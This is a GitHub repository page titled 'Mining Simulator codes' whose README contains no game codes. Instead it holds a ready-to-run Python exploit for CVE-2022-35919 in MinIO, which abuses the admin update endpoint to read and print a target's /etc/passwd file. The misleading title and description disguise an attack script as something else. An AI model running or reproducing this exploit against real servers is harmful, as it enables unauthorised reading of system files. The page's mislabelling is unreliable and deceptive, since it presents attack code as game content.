Skip to content

drparbahrami/Mining-Simulator-codes

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

README.md

README.md

 
 

Repository files navigation

Mining-Simulator-codes

Mining Simulator codes import urllib.parse import requests, json, re, datetime, argparse from minio.credentials import Credentials from minio.signer import sign_v4_s3

class MyMinio(): secure = False

def __init__(self, base_url, access_key, secret_key):
    self.credits = Credentials(
        access_key=access_key,
        secret_key=secret_key
    )
    if base_url.startswith('http://') and base_url.endswith('/'):
        self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
    elif base_url.startswith('https://') and base_url.endswith('/'):
        self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
        self.secure = True
    else:
        print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')

def poc(self):
    datetimes = datetime.datetime.utcnow()
    datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
    urls = urllib.parse.urlparse(self.url)
    headers = {
        'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
        'X-Amz-Date': datetime_str,
        'Host': urls.netloc,
    }
    headers = sign_v4_s3(
        method='POST',
        url=urls,
        region='',
        headers=headers,
        credentials=self.credits,
        content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
        date=datetimes,
    )
    if self.secure:
        response = requests.post(url=self.url, headers=headers, verify=False)
    else:
        response = requests.post(url=self.url, headers=headers)
    try:
        message = json.loads(response.text)['Message']
        pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
        matches = re.findall(pattern, message)
        if matches:
            print('There is CVE-2022-35919 problem with the url!')
            print('The contents of the /etc/passwd file are as follows:')
            for match in matches:
                print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
                                                    match[6]))
        else:
            print('There is no CVE-2022-35919 problem with the url!')
            print('Here is the response message content:')
            print(message)
    except Exception as e:
        print(
            'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
        print(response.text)

if name == 'main': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") args = parser.parse_args() minio = MyMinio(args.url, args.accesskey, args.secretkey) minio.poc()

About

Mining Simulator codes

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published